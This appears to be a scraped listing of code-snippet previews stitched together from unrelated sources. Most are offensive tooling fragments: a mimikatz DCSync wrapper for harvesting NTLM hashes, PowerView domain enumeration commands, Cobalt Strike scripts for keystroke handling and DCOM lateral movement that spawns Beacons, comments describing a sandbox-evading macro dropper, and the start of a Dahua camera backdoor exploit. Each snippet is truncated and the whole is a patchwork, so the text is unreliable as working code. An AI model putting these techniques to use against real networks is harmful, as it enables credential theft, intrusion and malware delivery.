| /* | |
| * CredentialUI.cs - Windows Credential UI Helper | |
| * | |
| * License: Public Domain | |
| * | |
| */ | |
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; |
Ubuntu 14.04.Secure Group Inbound Rules, add a SSH Rule(TCP, Port 22, 0.0.0.0/0) and a Custom TCP Rule(TCP, Port 1723, 0.0.0.0/0).sudo apt-get install pptpd.sudo vim /etc/pptpd.conf. Uncomment localip 192.168.0.1 and remoteip 192.168.0.234-238,192.168.0.245.sudo vim /etc/ppp/pptpd-options. Uncomment ms-dns and ms-wins. Change the IP to Google's DNS like this:
| function Invoke-DCSync | |
| { | |
| <# | |
| .SYNOPSIS | |
| Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
| Author: @monoxgas | |
| Improved by: @harmj0y |
| # NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/) | |
| # has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 | |
| # get all the groups a user is effectively a member of, 'recursing up' | |
| Get-NetGroup -UserName <USER> | |
| # get all the effective members of a group, 'recursing down' | |
| Get-NetGroupMember -GoupName <GROUP> -Recurse | |
| # get the effective set of users who can administer a server |
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
| # getexplorerpid($bid, &callback); | |
| sub getanypid { | |
| bps($1, lambda({ | |
| local('$pid $name $entry'); | |
| foreach $entry (split("\n", $2)) { | |
| ($name, $pid) = split("\\s+", $entry); | |
| if ($name eq $proc) { | |
| # $1 is our Beacon ID, $pid is the PID of $proc | |
| [$callback: $1, $proc, $pid]; | |
| } |
| # convert comma separated keystroke values into a string. | |
| sub toString { | |
| local('@temp'); | |
| @temp = split(",", $1); | |
| shift(@temp); | |
| return join("", map({ | |
| return chr(parseNumber($1, 16, 10)); | |
| }, @temp)); | |
| } |
| # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
| # Beacon implementation based on comexec.cna by Raphael Mudge | |
| # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
| # Register alias | |
| beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
| "Usage: dcom_shellexecute [target] [listener]\n\n" . | |
| "Spawn new Beacon on a target via DCOM ShellExecute Object."); |
| ' Author Arno0x0x - https://twitter.com/Arno0x0x | |
| ' | |
| ' This macro downloads an XML bibliography source file. | |
| ' The <Title> element of this XML file actually contains a base64 encoded MSOffice template | |
| ' which itself contains another malicious macro much more detectable (meterpreter for instance). | |
| ' | |
| ' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder | |
| ' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it. | |
| ' | |
| ' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers |
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |